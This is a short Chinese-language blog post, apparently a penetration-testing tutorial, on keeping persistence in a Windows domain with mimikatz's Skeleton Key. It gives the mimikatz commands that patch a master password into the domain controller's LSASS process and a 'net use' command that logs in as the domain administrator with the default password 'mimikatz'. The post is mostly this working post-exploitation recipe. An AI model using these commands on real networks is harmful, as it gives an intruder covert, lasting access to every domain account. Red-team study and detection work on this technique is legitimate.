参考作者:遗忘

0X01介绍

Skeleton Key被安装在64位的域控服务器上,支持Windows Server2003到Windows Server2012 R2,能够让所有域用户使用同一个万能密码进行登录,现有的所有域用户使用原密码仍能继续登录,注意并不能更改用户权限,这里需要注意的是重启将失效。

0X02步骤:

mimikatz的MISC::Skeleton,在 DC 中注入万能钥匙(Skeleton Key) 到 LSASS 进程中。这使得所有用户所使用的万能钥匙修补DC使用"主密码” (又名万能钥匙)以及他们自己通常使用的密码进行身份验证。

1、mimikaz执行命令:privilege::debug misc::skeleton
域权限维持:Skeleton Key

2、mimikatz的默认Skeleton Key设置为mimikatz(坑点:使用主机名链接)
net use \\WIN-6HQC11EJBDP.yiwang.com\c$ /user:"yiwang\administrator" "mimikatz"
域权限维持:Skeleton Key

相关文章:

  • 2021-07-19
  • 2021-11-20
  • 2021-12-30
  • 2021-09-02
  • 2021-09-16
  • 2021-06-09
  • 2021-08-26
  • 2021-09-03
猜你喜欢
  • 2022-12-23
  • 2022-02-21
  • 2021-11-30
  • 2022-12-23
  • 2021-11-23
  • 2022-12-23
  • 2021-11-02
相关资源
相似解决方案